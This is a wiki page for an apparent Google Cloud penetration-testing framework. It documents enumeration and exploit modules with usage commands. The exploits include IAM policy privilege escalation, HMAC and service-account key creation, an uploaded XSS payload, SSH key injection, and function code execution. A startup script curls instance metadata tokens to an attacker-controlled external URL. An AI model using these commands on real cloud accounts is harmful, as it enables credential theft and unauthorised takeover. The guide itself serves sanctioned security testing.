Skip to content

5. Modules Guide

WebbinRoot edited this page Jul 2, 2024 · 1 revision

Overview

Modules are, per the name, "modular" components of code that can be run from the python framework. They perform certain actions and most will log/save permission information as you run them. The running tally of permissions are visible by calling creds info periodically while using the tool.

To list all modules run:

([project_ID]:[credential_name])> modules

To run any module, swap out the <module_name> with the module name from the list above, and add the -h flag if you want to see all the flags supported.

([project_ID]:[credential_name])> modules run <module_name>

Module Organization + Searching

Modules are grouped by GCP services. For example, modules dealing with Cloud Storage (S3 Buckets if your from AWS) are under the "CloudStorage" directory in "Modules" folder.

Modules are also split up into several key categories. At this time this includes:

  • Enumeration: Enumerate data. Includes all testIAMPermission API calls via the --iam flag and can download content in some cases if supplied with a --download flag or other similar flag.
  • Exploit: Perform singular exploit attack such as setIamPolicy, implicit delegation, generate a service account key, etc.
  • Unauthenticated: Modules that require no credentials (ex. GCPBucketBrute taken from Rhino Security).

You can list all modules via the modules command

image

You can search for modules via modules search <keyword>

image

You can get information about modules with modules info <module_name>

image

Module Common Flags

Many modules also have the following flags:

  • -h/-v: help flag to see all options & increased verbosity flag respectively
  • --iam: Call testIamPermissions on the impacted resource and add whatever permissions are returned to the credential profile (seen via creds info in the tool). For example, modules run enum_buckets --iam will enumerate buckets AND call testIamPermissions for each bucket from both an authenticated & unauthenticated perspective logging the results. Run modules run enum_all --iam to run all enumeration modules with all testIamPermissions calls possible.
  • --project-ids: Most of the time the tool will default to your project ID at the workspace prompt or try all project IDs known. If you want to pass in a specific project ID at the command line you can pass in --project-ids project1,project2,project3 to override this and check the specified project IDs in most cases
  • --download (--take-screenshot/--download-serial for Compute): Download/Gather whatever content is being enumerated (ex. blobs for buckets, or source code for functions) to the local file system under GatheredData unless otherwise specified
  • --output: Save the downloaded data to a folder other than the default "GatheredData" directory
  • --[resource_name]: Most enumeration modules will first try to LIST all resources, then try to GET each individual resource (in order to test if the permission is allowed). To target a specific resource and skip the list step, most modules allow you to supply the specific resource name you want to fetch. Most modules will accept resources in the following format: projects/[project_id]/locations|zones/[location|zone]/resourcetype/[resource_name} where all the data is basically encapsulated in one string separated by "/" characters. The -h for the respective module should tell you how to pass in the info.
  • --minimal-calls: Just call the LIST APIs and NOT the GET APIs. Faster with less API calls.

No Module Flags

Most modules should be runnable without any flags specified. If a user calls an exploit module with no flags (ex. modules run exploit_storage_setiampolicy), than the tool will pull from its internal databases of data enumerated thus far and walk the user through a wizard for exploitation. An example is given below:

([project_ID]:[credential_name])> modules run exploit_storage_setiampolicy
> Choose an existing from below to update it to later invoke and get the sa creds:
> [1] [bucket_name_1]
> [2] [bucket_name_2]
> [3] [bucket_name_3]
> [4] Exit
> Choose an option: 1
> Do you want to use an enumerated SA, or enter a new email?
> [1] Existing SA
> [2] New Member
> [3] Exit
> Choose an option: 2
> Provide the member account email below in the format user:<email> or serviceAccount:<email>: user:[personal_email]
> A list of roles are supplied below. Choose one or enter your own:
> [1] roles/storage.admin (Default)
> [2] roles/storage.objectCreator
> [3] roles/storage.objectViewer
> [4] roles/storage.objectUser
> [5] roles/storage.objectAdmin
> [6] roles/storage.folderAdmin
> [7] roles/storage.hmacKeyAdmin
> [8] roles/storageinsights.admin
> [9] roles/storageinsights.viewer
> [10] roles/storage.insightsCollectorService
> [11] Different Role
> [12] Exit
> Choose an option: 1
[*] Binding Member user:[personal_email] on [bucket_1] to role roles/storage.admin
[*] Successfully added user:[personal_email] to the policy of bucket [bucket_1]

Individual Module Descriptions

Services That Support Resource-Based Policies

Certain resources in GCP allow one to set IAM policies at the resource level as opposed to just at the project level. For example, you can set a policy for Google Cloud Storage at the project level to cover all buckets in that project, or you can specify a policy on individual buckets to make the permissions more granular as needed. A list of resources that support resource-level policies can be found here: https://cloud.google.com/iam/docs/resource-types-with-policies.

[Exploit] exploit_[service_name]_setiampolicy

Overview: Set the IAM policy for orgs/projects/folders or for a resource that support policies. The module will try appending the given member/service account to the existing IAM policy tied to the specified role. This can allow privilege escalation. For example, if User A has the viewer role + the resourcemanager.projects.setIamPolicy permission, they could call exploit_projects_setiampolicy on the project to add themselves to the project under the owner role.

Before SetIAMPolicy on Project ABC

member: coolguy
roles:
   - roles/viewer
   - roles/customRole # Allows resourcemanager.projects.setIamPolicy

After SetIAMPolicy on Project ABC

member: coolguy
roles:
   - roles/viewer
   - roles/customRole # Allows resourcemanager.projects.setIamPolicy
   - roles/owner

Append vs Overwrite: By default the tool will always try to append your member/role combo to the existing policy. If it cannot do that due to lack of read permissions for the current policy, or you just want to remove existing policy info, pass in the --overwrite flag to potentially overwrite the entire policy with just your member/role combo. Note this is much more destructive so be careful with it.

Common Use Cases

  • Try to append coolbeans as storage admin to the specified bucket in Google Storage
modules run exploit_storage_setiampolicy --member user:coolbeans@[domain] --roles "roles/storage.admin" --bucket [bucket_name]
  • Try to overwrite the existing policy with coolbeans as storage admin to the specified bucket in Google Storage
modules run exploit_storage_setiampolicy --member user:coolbeans@[domain] --roles "roles/storage.admin" --bucket [bucket_name] --brute
  • Try to append coolbeans as owner to the specified project in Google Storage
modules run exploit_project_setiampolicy --member user:coolbeans@[domain] --roles "roles/owner" --project-ids [project_name]

Everything

These modules are more miscellaneous or cover all resources enumerated thus far as opposed to a specific service.

[Enumeration] enum_all

Overview: Calls ALL enumeration modules and is usually the goto if you are trying to determine permission level for credentials.

Order of Operations: The following sequence of events occurs when running enum_all:

  1. Call enum_resources to try to find any additional projects/folders/organizations. If more projects are found, automatically runs all subsequent enumeration modules on the newly identified projects as well ensuring complete coverage.
  2. Call the following modules on all projects at this point:
    1. Cloud Compute --> enum_instances
    2. Cloud Compute --> enum_compute_projects
    3. Cloud Functions --> enum_functions
    4. Cloud Storage --> enum_hmac_keys
    5. Cloud Storage --> enum_buckets
    6. IAM --> enum_service_accounts
    7. IAM --> enum_custom_roles
  3. At the very end, call enum_policy_bindings to try to get ALL IAM bindings on ALL resources enumerated thus far.

Additional flags: Pass in the following flags to in turn run the equivalent operations on all enumeration modules:

  1. --iam: Call testIamPermission for every enumeration module that supports it
    1. --all-permissions: Call testIamPermissions for enum_resources (projects/folders/orgs) but pass in around 9000 permissions instead of the smaller default set
  2. --download: Download bucket blobs, take cloud compute screenshots, download cloud compute serial logs, download cloud function source code.

Common Use Cases

  • Enumerate all resources
modules run enum_all
  • Enumerate all resources and perform testIamPermissions where applicable. Try downloading data too.
modules run enum_all --iam --download

[Process] process_iam_bindings

Overview: This will take all the IAM bindings you have enumerated thus far, and condense them into a single dictionary structure. Note this all happens offline, no GCP calls should be made as its just inspecting the data you already collected. So while before you might have 1 policy binding for scott on bucket 123, and another policy binding for scott on bucket 456, process_iam_bindings will turn this into one database row with a dictionary representing both policies. You can add --txt or --csv to this to get the data structure in a easy-to-read format in a txt or csv format file in GathredData. If you don't want the stdout, you can pass in --silent.

Prerequisite: To process IAM bindings, you need to have IAM bindings enumerated. Run modules run enum_policy_bindings before running this module.

Inheritance + Convenience Roles: Process IAM bindings will show all inherited roles + dynamically resolve any convenience roles (Ref: https://cloud.google.com/storage/docs/access-control/iam#convenience-values) if applicable. It is clearly denoted in the final summary if the role for the user is from inheritance or convenience.

Common Use Cases

  • Give the STDOUT out for policy summary for each user
modules run process_iam_bindings
  • Turn off STDOUT and save the policy summary for each user to a txt and csv file
modules run process_iam_bindings --silent --txt --csv

[Enumeration] analyze_vulns

Overview: This is currently being added to. As of now it should

  1. Call out resources with allUsers or allAuthenticatedUsers members
  2. Review all roles from process_iam_bindings and flag all direct/inherited individual roles that represent violations (ex. Create Service Account Key)
  3. Review all roles from process_iam_bindings and flag all direct/inherited groupings of roles that represent violations (ex. Create Cloud Function)
  4. Review all individual permissions normally visible via creds info for any permission violations Like process_iam_bindings, you can pass in --txt or --csv to write the output to Gathered Data in either format.

Prerequisite: To analyze IAM bindings, you need to have processed IAM bindings enumerated. Run modules run process_iam_bindings before running this module.

Common Use Cases

  • Analyze all vulns thus far
modules run analyze_vulns
  • Analyze all vulns thus far silent + txt/csv output
modules run analyze_vulns --silent --txt --csv

[Process] generate_graph

Overview: Use Matplotlib and networkx to try to generate a graphical representation of the projects/folders/organizations enumerated thus far. Note this is helpful when correlation projects name (projects/#) to project ID (project_string).

Prerequisite: To generate the graph we would assume enum_resources was successful and folders/orgs/project names were populated.

Deleted: Pass in --show-deleted to show all the nodes including those projects/folders/orgs marked for deletion.

Cloud Storage

[Enumeration] enum_buckets

Overview: The module enumerates buckets AND the corresponding blobs in each bucket. Per the help menu, both a bucket name & blob name, or file of bucket names and file of blob names, can be supplied via --buckets/--blobs & --buckets-file/--blob-file respectively. While all blobs are saved in the database, up to 10 blobs are displayed in the final summary output.

Permissions: Use the --iam flag to call testIamPermissions on the specified bucket both authenticated and unauthenticated. Permissions are not checked for each blob due to the mass amount of blobs there might be. You can see the summary of permissions found via creds info [--csv]..

Downloads: Use the --download flag to download every blob in a bucket if allowed permissions-wise. Since there can be so many blobs, you can use the following flags

  • --file-size: Download only files that are under the file size limit.
  • --good-regex: Download only files matching the python re regex. For example, only download files ending with the ".txt" extension
  • --time-limit: Run GET/TestIamPermissions/Download API calls on a given bucket for a maximum time limit. If the time limit is reached, GCPwn moves onto the next bucket regardless if its finished checking every blob in the current bucket.

HMAC Keys: Given an HMAC key for a service account, pass in the key and secret via --access-id and --hmac-secret. enum_buckets will then try to leverage the GCP XML API via Sigv4 requests to list and get bucket/blob data. You can also pass in these flags with --download to try to download content via the XML API SigV4 API calls as opposed to the normal method. If you have no access-ids/hmac-secrets but have the 'storage.hmackeys.create' permission, review the "exploit_storage_hmac" to create a set of keys that you can then use with the enumeration module. If you want to see the HMAC keys that are available to your user, you can pass in the --list-hmac-secrets flag. Note at this point in time enumerating GCP storage endpoints with HMAC keys will leverage AWS headers since those are supported :)

Common Use Cases

  • Enumerate all buckets, don't do any IAM checks, don't download any data
modules run enum_buckets
  • See if any HMAC secrets have been stored via previous calls to exploit_storage_hmac
modules run enum_buckets --list-hmac-secrets
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, **don't ** download any data
modules run enum_buckets --iam
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, download any data
modules run enum_buckets --iam --download 
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, download any data ending with ".sh"
modules run enum_buckets --iam --download --good-regex "\.sh"
  • Enumerate all buckets, perform IAM checks from auth and unauth perspective, download any data via the HMAC XML SigV4 API, but ONLY use LIST APIs (aka use less API calls to try go get the same data)
modules run enum_buckets --iam --download --access-id <access_id> --hmac-secret <hmac_secret> --minimal-calls

[Enumeration] enum_hmac_keys

Overview: The module enumerates HMAC keys. Note HMAC key secrets can ONLY be found when creating the HMAC key via APIs, so this won't give you back HMAC key secrets. HMAC keys can be found via the Interoperability setting in Cloud Storage as seen below. You can read more about this feature in other articles, but you basically can bind HMAC keys to a service account and use them to generate a generic SigV4 to get the bucket contents reflecting the permissions of the previously mentioned service accounts. If you want to read more about the feature see https://cloud.google.com/storage/docs/authentication/hmackeys#overview

image

Common Use Cases

  • Enumerate all HMAC keys. Note this won't include HMAC secrets as those only appear for the "create" API
modules run enum_hmac_keys

[Exploit] exploit_bucket_upload

Overview: This is just a wrapper to let one upload a local file (or STDIN) to a GCP bucket. Depending on how the bucket is used this might assist a pentester. For example, if one can overwrite the source code for a GCP function, or change files being used by a website, etc. One can supply the local file to upload and remote path to upload it via command line arguments --local-blob-path & --remote-blob-path. One can supply data to write to --remote-blob-path via STDIN by passing in the data in Base64 format with --data-string-base64. Note remote blob path can include directories (ex. directory1/directory2/myfileimuploading.txt). Note the bucket name supplied also does not need the gs:// format, its just the bucket name.

  • Supply no arguments to prompt wizard walkthrough
modules run exploit_bucket_upload
  • Upload the local "myfile.txt" to [bucket_name] under a new directory at newdirectory/myfile.txt supplying all necessary arguments
modules run exploit_bucket_upload --bucket [bucket_name] --local-blob-path /home/kali/Desktop/myfile.txt --remote-blob-path newdirectory/myfile.txt
  • Upload <script>alert(0)</script> to an HTML document in the bucket
modules run exploit_bucket_upload --bucket [bucket_name] --data-string-base64 "PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==" --remote-blob-path static/assets/myfile.html

[Exploit] exploit_storage_hmac

Overview: Create an HMAC key for a given service account (--create), enable an already existing HMAC key (--update --state ACTIVE), or disable an already existing HMAC key (--update --state INACTIVE). If creating an HMAC key, the service account email can be provided via --sa-email. Note per GCP documentation one ONLY gets the HMAC key secret when creating an HMAC key. A created HMAC key including the secret will be saved to the internal database for later use if needed and will pop up in wizard prompts. If a user chooses to make an HMAC key, the module will automatically ask you at the end if you want to use the newly created key/secret to try to enumerate all bucket content, otherwise you can call enum_buckets in a later call and supply the --access-id and --hmac-secret manually. Finally, as a shortcut you can see all existing, known secrets for the workspace with modules run enum_buckets --list-hmac-secrets.

  • Prompt wizard walkthrough (will pull data from enumerated data thus far when presenting choices)
modules run exploit_storage_hmac
  • Create a HMAC key for the given service account. Secret returned in this case and stored in database
modules run exploit_storage_hmac --create --sa-email [name]@compute-system.iam.gserviceaccount.com 
  • Re-enable (update to "ACTIVE") a previously disabled HMAC key
modules run exploit_storage_hmac --update --state "ACTIVE" --access-id [access-id]

[Unauthenticated] unauth_bucketbrute

Overview: This is GCPBucketBrute located here which uses a keyword and associated permutations to brute force bucket names. If a bucket name is found it checks what anonymous permissions are allowed. At this point in time the module only does unauthenticated permission checks when given a key name. Note this is standalone copy/paste as well so it does NOT save any data to the internal databases at this point in time.

  • Try to find any buckets with the keyword and check for unauthenticated permissions if found
modules run unauth_bucketbrute --key company_keyword

Cloud Compute

[Enumeration] enum_instances

Overview: The module tries to enumerate all instances. By default it will try to get the instances in all zones so you usually won't need to specify a flag. That being said, you can specify specific zone flags if you want to scope this down to specific zones as follows:

  • --all-zones: A bit redundant but this will use all the zones in utils-->zones.txt if you want a clear list of zones to check against.
  • --zones-list: Provide a list of zones via STDIN, --zones-list zone1,zone2,zone3
  • --zones-file: Provide a file with list of zones to try, one per line

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified instance.

Downloads: If you have the permissions, you can try taking a screenshot via "--take-screenshot" and/or downloading the serial logs via "--download-serial". Downloading the serial logs will save the logs to a txt file with the timestamp appended in case you perform multiple downloads.

Common Use Cases

  • Enumerate all instances, **don't ** do any IAM checks, **don't **download any data
modules run enum_instances
  • Enumerate all instances, perform IAM checks from auth perspective, **don't ** download any data
modules run enum_instances --iam
  • Enumerate all instances, perform IAM checks from auth and unauth perspective, download any data
modules run enum_buckets --iam --take-screenshot --download-serial

[Enumeration] enum_compute_projects

Overview: GCP Compute has its own definition of the "project" entity in GCP. Namely it includes the metadata attributes that might contain SSH keys, enable-oslogin settings, etc. This is a standalone enumeration module to run and is needed if you want to try correlating data for some exploit modules.

Common Use Cases

  • Get the current project info as a compute object
modules run enum_instances
  • Get the specified project info as a compute object
modules run enum_instances --project-ids <project_name>

[Exploit] exploit_instance_startup_script

Overview: Compute instances allow you to specify startup scripts in a specific metadata key that will run when an instance first turns on. Thus, with the necessary permissions you could create an instance (--create-new-instance), attach a service account to it (--service-account), and start the instance with a startup script that exfiltrates the service account info from the compute metadata endpoints to an external url you control(--external-url). This exploit script seeks to automate all that.

Startup Script: The current startup script used is shown below:

#!/bin/bash
apt-get update
apt-get install -y curl
curl {external_url}/gce_token -k -d \"$(curl --header \"Metadata-Flavor:Google\"  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token)\"
curl {external_url}/scopes -k  -d \"$(curl --header \"Metadata-Flavor:Google\"  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes)\"
curl {external_url}/email -k  -d \"$(curl --header \"Metadata-Flavor:Google\"  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email)\"

Note you need to supply the --external_url argument where you will capture the credentials when they are exfiltrated on instance startup (ex. a burp collaborator link). To run your own code, you can specify our own startup script with --startup-script-path

Create vs Update: Ideally you would create a brand new compute instance with the service account credentials. To do so pass in --create-new-instance. Note the tool also supports the update operation via --update-via-shutdown. However, at this point in time it WILL restart the machine and WILL wipe all the previous data/metadata so this is the most destructive less ideal option.

[Exploit] exploit_instance_ssh_keys

Overview: This module will attempt to upload an SSH Key(s) either to the metadata of the project that contains the targeted instance, or to the metadata of the instance itself. Once the module is done, you can try SSH'ing to the instance using the private portion of the public key you just uploaded.

SSH Keys: You can pass in the SSH key either through the command line STDIN base64 encoded, or you can pass in a file with the ssh key. For example, if you create the SSH key via the ssh-keygen method shown below, you would want to pass in the ssh-key-file of /home/kali/.ssh/connection-test.pub to upload the public portion of the SSH key. Note that GCP also wants the username of the SSH key, so you just need to pass that in via --username. In the example below the username would just be "test123" for example.

Instance vs Project: Specify either instance with --instance-level or project with --project-level when writing the metadata. Writing the SSH key to the instance means you can JUST SSH into that instance. Writing the SSH key to the project means you can potentially SSH into ALL the compute instances in that project.

Append vs Overwrite: The module by default will try to append the SSH keys to the ssh-key metadata value if it already exists. If you want to overwrite the keys AND ALL INSTANCE METADATA, than pass in --brute.

  • Generating an SSH Key Pair
> ssh-keygen -t rsa -f /home/kali/.ssh/connection-test -C test1234 -b 2048
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/connection-test
Your public key has been saved in /home/kali/.ssh/connection-test.pub
> cat ~/.ssh/connection-test.pub                                    
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8rt9P8MG+XW7ZUhirFonlEmuqbuoqupK5shkhjQAI58l[TRUNCATED] test123                       
  • Provide no arguments and walk through wizard
modules run exploit_instance_ssh_keys
  • Add the SSH key at the specific instance level
modules run exploit_instance_ssh_keys --instance-level --instance-name projects/[project_id/zones/[zone_id]/isntances/[instance_name]  --ssh-key-file "file_path" --username kali
  • Example Run
([project-name]:scott)> modules run exploit_instance_ssh_keys --project-level --ssh-key-file /home/kali/.ssh/connection-test.pub  --username test1234
> Choose an existing project from below to set the IAM policy:
> [1] [project-name]
> [2] Exit
> Choose an option: 1
{'kind': 'compute#metadata', 'items': [{'key': 'ssh-keys', 'value': 'test1234:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8rt9P8MG+XW7ZUhirFonlEmuqbuoqupK5shkhjQAI58lnBrMf[TRUNCATED] test1234'}], 'fingerprint': 'CmjRNy8b_Jg='}

> ssh -i ~/.ssh/connection-test test1234@[external_ip]
[TRUNCATED] #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
test1234@instance-20[TRUNCATED]:~$ whoami
test1234

Cloud Functions

[Enumeration] enum_functions

Overview: The module enumerates V1 & V2 functions. By default it will try to get the instances in all regions so you usually won't need to specify a flag. That being said, you can specify specific region flags if you want to scope this down to specific zones as follows:

  • --v1-regions: Just check regions associated with V1 functions.
  • --v2-regions: Just check regions associated with V2 functions.
  • --v1v2-regions: What default would basically be, but go through V1+V2 regions per file
  • --regions-list: Provide a list of zones via STDIN, --zones-list zone1,zone2,zone3
  • --regions-file: Provide a file with list of zones to try, one per line

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified function.

Downloads: Use the --download flag to download the source code for each function. At this time this just supports source code stored in Google Storage. Github/Repository is not supported at this time but in progress

External curl: Use the --external-curl flag to try sending a curl request to the given function by either trying its URL attribute or trying a URL based off the function name. Successful response is logged in case you want that info.

Common Use Cases

  • Enumerate all functions, **don't ** do any IAM checks, **don't **download any data
modules run enum_functions
  • Enumerate all functions, perform IAM checks from auth perspective, **don't ** download any data
modules run enum_functions --iam
  • Enumerate all functions, perform IAM checks from auth perspective, download any data
modules run enum_functions --iam --download 
  • Enumerate all functions in given region, perform IAM checks from auth perspective, do external curl to see if URL is live, download any data and save it to functions_data directory
modules run enum_functions --iam --download --regions-list us-central1,us-central2 --external-curl --output functions_data

[Exploit] exploit_functions_invoke

Overview: Call a V1 or V2 cloud function either by creating a function (--create) or updating an existing one (--update). Note you can also use this module to just invoke functions (--invoke) in general if you want to execute some other arbitrary code. Note there is no official GCP API to call the V2 cloud function so I use some python requests magic to call it.

Setup Bucket: To create or update a function, you need to upload your code to that function by pointing the function to a Google Cloud storage bucket. You can either host the ZIP on a bucket in your own account, or gcpwn lets you upload the code to a bucket in the target account. Either way, you can specify a source via --bucket-src gs://[mybucketname]/myfile.zip. Supplying no flag will prompt the tool to ask if you want to upload the ZIP file to a bucket in the target account. In terms of ZIP files to use, the codev1v2.zip file in Modules-->CloudFunctions-->utils folder will return the credentials and emails for an attached service account and is the default code the tool is built around.

Service Account: Choose a service account to tie to the cloud function when creating/updating it via the --service-account flag. Note if you are CREATING a new function, there is no way to specify no service account. It will by default, per the SDK, always attach the default role with Editor permissions.

V1 or V2: The tool will usually prompt or auto-detect what version the function is especially if it exists/already has been enumerated. However, if you know the version pass in --v1 or --v2 to speed things up. Note if you choose the wrong version you might get a 404 so can always try the other version.

Create or Update: Choose to create a function (--create) or update a function (--update) with your code. Note updating will WIPE all of the previous code with your python code, so it is a bit destructive. A less direct alternative might be to download the source code via modules run enum_functions --download, unzip the source code, edit it to include the logic of codev1v2.zip, and point to that code to help avoid detection.

Invoke & Assume: Just because you create/update a function with code does not mean its executed. To actually invoke/call a function add the --invoke flag which will return the function response. If you are using the default codev1v2.zip, than creds should be returned and additionally adding --assume-creds flag will auto-add and change your current user in GCPwn to the newly returned credentials.

  • Begin the interactive prompts
modules run exploit_functions_invoke
  • Call/Invoke an existing specified function (no creation/update/assume/etc)
modules run exploit_functions_invoke --function-name projects/[project_id]/regions/[region]/functions/[function-name]  --invoke
  • Call/Invoke a function (no creation/update/assume/etc) and let the tool return a list of possible functions to call
modules run exploit_functions_invoke --invoke
  • Create a new function (by default will have service account with editor creds), call the newly created function, and assume the creds
modules run exploit_functions_invoke--create --v2 --function-name projects/[project_id]/regions/[region]/functions/[new-function-name] --bucket-src gs://[mybucket]/myfile.zip --invoke --assume-creds 
  • Update an existing function, call the newly created function, and assume the creds
modules run exploit_functions_invoke--update --function-name projects/[project_id]/regions/[region]/functions/[existing-function-name] --bucket-src gs://[mynewbucket]/myfile.zip --invoke --assume-creds

Resource Manager

[Enumeration] enum_resources

Overview: Enumerates all projects, folders, and organizations. Tries to both list projects/folders/orgs as well as search for projects/folders/orgs using a recursive tree to see if any additional resources can be found.

Project/Folder/Org: Scope down the enumeration to just projects/folders/orgs per the --projects, --folders, and --organizations flag. Note one can combine this with --iam to just enumerate permissions IAM wise for each resource.

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified project/folder/org. Note this module also includes the --all-permissions flag which passes in ~9000 permissions to check for each individual project/foler/org. This can take a while due to the large amount of permissions and the need to batch requests per GCP.

  • Enumerate all projects/folders/organizations
modules run enum_resources
  • Enumerate all projects/folders/organizations but don't try recursive tree (less API calls)
modules run enum_resources --no-recursive
  • Enumerate all projects/folders/organizations and get their IAM permissions
modules run enum_resources --iam
  • Enumerate all folders, and check for EVERY IAM permission (~9K) for each folder
modules run enum_resources --folders --iam --all-permissions

IAM

[Enumeration] enum_custom_roles

Overview: Attempt to enumerate all custom roles in the GCP account. The ability to enumerate custom roles allows gcpwn to store the role definition for later reference when doing analysis. At this point in time only project-level custom roles are enumerated (organization-level custom roles are not checked).

  • Try to enumerate all custom roles at the project level. Definitions will be stored for later reference
modules run enum_custom_roles

[Enumeration] enum_policy_bindings

Overview: For every resource enumerated thus far (organizations/folders/projects/buckets/functions/instances/service accounts), try to retrieve the respective IAM policy bindings. Note this module is necessary if you want to start doing analysis with all the policy bindings to find role violations. Since there is no "list_users" API call in GCP , getting policy bindings will also passively add user entities found to the internal database for later use during prompting.

  • Try to get policy bindings for all resources enumerated thus far
modules run enum_policy_bindings

[Enumeration] enum_service_accounts

Overview: Enumerate service_accounts and service account keys. Note the secret portion of a service account key is only returned during the creation API call. See exploit_service_account_keys for more details.

Permissions: Use the --iam flag to call authenticated testIamPermissions on the specified service account.

  • Enumerate service_accounts & service_keys
modules run enum_custom_roles
  • Enumerate service_accounts & service_keys, call authenticated testIAMPermissions on service_accounts, make minimal API calls
modules run enum_custom_roles --iam --minimal-calls

[Exploit] exploit_service_account_keys

Overview: Create a service account key for a specified service account via the --create flag and assume the new credentials with --assume. You can also update the status of an existing key set by either disabling or enabling it via the --disable or --enable flags respectively.

  • Prompt the wizard to begin the exploit path
modules run exploit_service_account_keys
  • Create a new service account key and assume the new credentials
modules run exploit_service_account_keys --create --sa [email] --assume

[Exploit] exploit_generate_access_token (Implicit Delegation)

Overview: Generate an access token for the given service account. To directly generate an access token for a targeted service account, pass in the service account email via the --target-sa flag.

Implicit Delegation: Review the concept of implicit delegation via recently released articles. In essence, a user or service account can have implicit delegation rights on a service account, which in turn can have implicit delegation rights on another service account, etc. At the end of this implicit delegation chain a service account might be able to call an API to generate an access token on a final service account. As the "starting node" of this implicit delegation chain, you can leverage this to get the access token from that final API call. To this effect, there are several flags to pass in:

  • --all-delegation: Based off data enumerated thus far, auto-detect impersonate routes that end in getting an access token, and present all impersonation routes to the end user. Note the only caveat is your caller needs impersonation permissions on that first node. Also to auto-detect routes you need to get the data via modules run enum_all or modules run enum_service_accounts followed by modules run enum_policy_bindings
  • --delegation-target: Generate all impersonation routes that end with the delegation target and return that to the end user